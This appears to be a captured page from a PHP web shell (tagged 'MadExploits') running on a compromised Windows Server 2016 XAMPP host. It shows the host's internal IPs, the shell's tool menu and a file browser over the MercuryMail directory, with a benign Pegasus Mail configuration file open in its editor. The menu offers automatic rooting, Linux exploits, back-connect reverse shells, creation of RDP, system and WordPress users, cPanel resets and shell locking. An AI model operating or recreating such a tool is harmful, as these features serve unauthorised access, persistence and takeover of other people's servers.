Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
MercuryMail /
RESOURCE /
[ HOME SHELL ]
Name
Size
Permission
Action
autorplc.pm
20.19
KB
-rw-rw-rw-
basic.pnc
233
B
-rw-rw-rw-
basic.pnc.info
1.15
KB
-rw-rw-rw-
bpanel.txt
15.3
KB
-rw-rw-rw-
daemon.h
35.77
KB
-rw-rw-rw-
daemon.txt
100.31
KB
-rw-rw-rw-
filetype.pm
3.77
KB
-rw-rw-rw-
greeting.txt
2.05
KB
-rw-rw-rw-
helpdesk.pm5
1.42
KB
-rw-rw-rw-
listserv.pm5
1.01
KB
-rw-rw-rw-
mercuryb.htm
2.77
KB
-rw-rw-rw-
mime-map.pm
874
B
-rw-rw-rw-
order32.dll
193.5
KB
-rw-rw-rw-
order32.fff
3.32
KB
-rw-rw-rw-
poppass.dll
19.52
KB
-rw-rw-rw-
poppass.fff
2.89
KB
-rw-rw-rw-
poppass.txt
844
B
-rw-rw-rw-
ppass32.dll
57
KB
-rw-rw-rw-
ppass32.fff
2.91
KB
-rw-rw-rw-
prefix.pm
1.97
KB
-rw-rw-rw-
rasdial.zip
13.04
KB
-rw-rw-rw-
readme.1st
808
B
-rw-rw-rw-
rescom.exe
88
KB
-rwxrwxrwx
rquotes.r
2.23
KB
-rw-rw-rw-
spambust.dat
27.91
KB
-rw-rw-rw-
template.txt
20.43
KB
-rw-rw-rw-
template.zip
3.02
KB
-rw-rw-rw-
transflt.mer
4.73
KB
-rw-rw-rw-
winpmdde.txt
28.17
KB
-rw-rw-rw-
wpm-char.r
1.35
KB
-rw-rw-rw-
wpm-lmtt.r
23.76
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : poppass.fff
; ; Form Fact File for the sample Pegasus Mail PopPass extension ; Pegasus Mail System, Copyright 1990-99 David Harris, all rights reserved. ; ; FFFs are examined by Pegasus Mail at startup and are used to determine ; what forms resources are available to users. WinPMail scans the following ; locations when looking for FFFs - ; ; * The user's home mailbox ; * The base directory (ie, where WINPMAIL.EXE resides) ; * If present, the directory indicated by an FFF environment variable. ; ; An FFF may contain definitions for as many forms as you wish - in general ; terms, system-wide FFFs are best defined in a single file since this will ; speed the startup of the program, but the ability to have multiple FFFs ; can make for much simpler installation of new forms. ; ; ------------------------------------------------------------------------- ; WARNING -- WARNING -- WARNING -- WARNING -- WARNING -- WARNING -- WARNING ; ------------------------------------------------------------------------- ; WinPMail forms are executable code! You should never load forms onto your ; system unless you are absolutely certain of their pedigree, because they ; are a perfect vehicle for trojan horses. ; ------------------------------------------------------------------------- ; ; The following keywords are recognized in this file: ; ; "Form name" - The name which should appear in the form selector list ; "Form DLL" - Full path to the DLL containing the form's code ; "Form type" - Either COMPOSER or READER ; "Form flags" - A bitmap value - see below ; "Form tagname" - Form's registered tagname written into outgoing mail ; "Form data" - Any custom data required by the form ; "End" - End of definition - add the form to the form list. ; ; "Form triggers" - only valid for READERS - what should activate the form ; ; "Form flags" is a bitmap composed of the following bits: ; ; Mnemonic Value Meaning ; ---------------------------------------------------------------- ; WPM_STARTUP 1 Load the extension when WinPMail starts up ; WPM_NOLIST 2 Do not show in the "Extensions" window list ; WPM_HIDDEN 4 Hide the parent MDI window on loading ; WPM_LOGGING 8 Extension wants to receive logging events ; WPM_ONEONLY 16 Only allow one running instance at any time ; WPM_USES_TCP 64 Extension requires TCP/IP services to run ; ; Various flags can be combined by adding (or ORing) the values ; together - so to have a hidden extension which loads at startup, ; is interested in logging events, and does not appear in the ; "Extensions" window, you would use 1 + 2 + 4 + 8 = 15 ; Form name = "Change POP3 password" Form DLL = ~a\POPPASS.DLL Form type = COMPOSER Form flags = 80 Form tagname = "PM-POPPASS" ; You can enter a default server port in the "Form Data" field Form data = "106" End
Close